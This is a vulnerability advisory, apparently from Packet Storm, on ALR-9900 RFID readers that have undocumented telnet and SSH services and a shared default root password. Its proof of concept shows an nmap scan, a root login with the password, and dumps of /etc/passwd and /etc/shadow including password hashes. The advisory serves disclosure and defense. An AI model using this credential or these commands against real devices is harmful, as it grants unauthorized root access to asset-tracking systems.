what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Alien Technology ALR-9900 Default Passwords

Alien Technology ALR-9900 Default Passwords
Posted May 6, 2010

Alien Technology ALR-9900 RFID readers suffers from default root and alien passwords.

tags | exploit, root
SHA-256 | 0a2e49012acb6173cec1a6a2092df37ff107933d0c0373e7ea8f742cdbbc811b

Alien Technology ALR-9900 Default Passwords

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tested:
www.alientechnology.com/readers/alr9900.php

Background:
Alien Technology is a major rfid-reader designer and manufacturer.
Alien's products are sold to many corporations and the military.
Alien's readers can be interfaced with in several ways including:
serial, IO Port and Ethernet port. Alien has several daemons
running on their reader that accessible through Ethernet and
completely undocumented. We called Alien several times to ask them
about these undocumented services and were first deferred to
technical support and then had our numbers blocked. We then
emailed them about the security ramifications of these daemons and
received no reply.

The Undocumented:
port 2323 - telnetd
port 23 - telnetd
port 22 - sshd

The Flaws:
default root password = 'alien'
alien account has same password across all readers
port 2323 - provides a backdoor onto the readers for anyone who
knows the alien (or root) account password
port 23 - ""
port 22 - ""

The P.O.C:
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific
Daylight Time

Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
2323/tcp open unknown

MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds


login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien

Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@alien-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)

root@alien-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The
Alien,18220,,:/home/alien:/bin/bash

root@alien-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::

Impact:
Alien's readers are deployed in many secure facilities with
typically closed networks. Although these networks are closed,
these undocumented services could allow employees to modify reader
settings and subvert checkout systems. These checkout systems are
often used to track valuable items making such vulnerabilities a
serious matter. If these readers are deployed on an open or large
network they provide an easy way to tunnel into the network or
attack it from an unexpected location. Lastly, if someone cracks
the alien account's password hash they get to use Alien's backdoor.

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc
0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN
Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8
ZXExxzM=
=Bb1k
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close